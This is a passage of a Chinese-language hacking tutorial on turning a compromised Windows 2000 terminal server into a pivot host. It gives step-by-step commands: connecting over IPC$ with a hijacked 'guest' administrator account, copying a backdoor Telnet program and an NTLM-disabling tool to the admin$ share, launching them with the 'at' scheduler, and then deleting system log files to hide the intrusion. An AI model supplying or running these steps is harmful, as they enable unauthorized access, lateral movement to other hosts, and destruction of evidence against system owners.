二，创建跳板。
再次登录终端用务器，以"guest"身份进入，此时guest已是系统管理员，已具备一切可执行权。打开“控制面板”，进入“网络和拔号连接”，在“本地连接”或“拔号连接”中查看属性，看对方是否选择“Microsoft 网络的文件和打印机共享”，如果没有，就打上勾。对方如果使用的是拔号上网，下次拔号网络共享才会打开。
退出对方系统，在本地机命令提示符下，输入
net use \\IP Address\IPC$ ["password"] /user:"guset"，通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Telnet的程序上去（小榕流光安装目录下的Tools目录里的Srv.exe,另外，还有ntml.xex，一会要用），这个程序是在对方上面开一个Telnet服务，端口是99。
copy c:\hack\srv.exe \\***.***.***.***\admin$
然后利用定时服务启动它，先了解对方的时间：
net time \\***.***.***.***
显示：
\\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55
命令成功完成。
然后启动srv.exe:
at \\***.***.***.*** 09:00 srv.exe　
显示：
新加了一项作业，其作业 ID = 0
过几分钟后，telnet ***.***.***.*** 99
这里不需要验证身份，直接登录，显示：
c:\winnt:\system32>
我们就成功登陆上去了。然后又在本地打开命令提示符，另开一个窗口，输入：
copy c:\hack\ntlm.exe \\211.21.193.202\admin$
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口，运行ntlm.exe
C:\WINNT\system32>ntlm
显示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
C:\WINNT\system32>
好，现在我们来启动WIN2000本身的telnet，首先终止srv.exe的telnet服务：
net stop telnet　系统告诉你并没有启动telnet，不理它，继续：
net start telnet　这次真的启动了telnet，我们可以在另开的命令提示符窗口telnet到对方的
23端口，验证身份，输入我们的guest账号和密码，它就真正成为我们的跳板了。我们可以利用它到其它的主机去。
三、扫除脚印：
删除为net.exe 创建的快捷方式，删除winnt\system32\logfiles下边的日志文件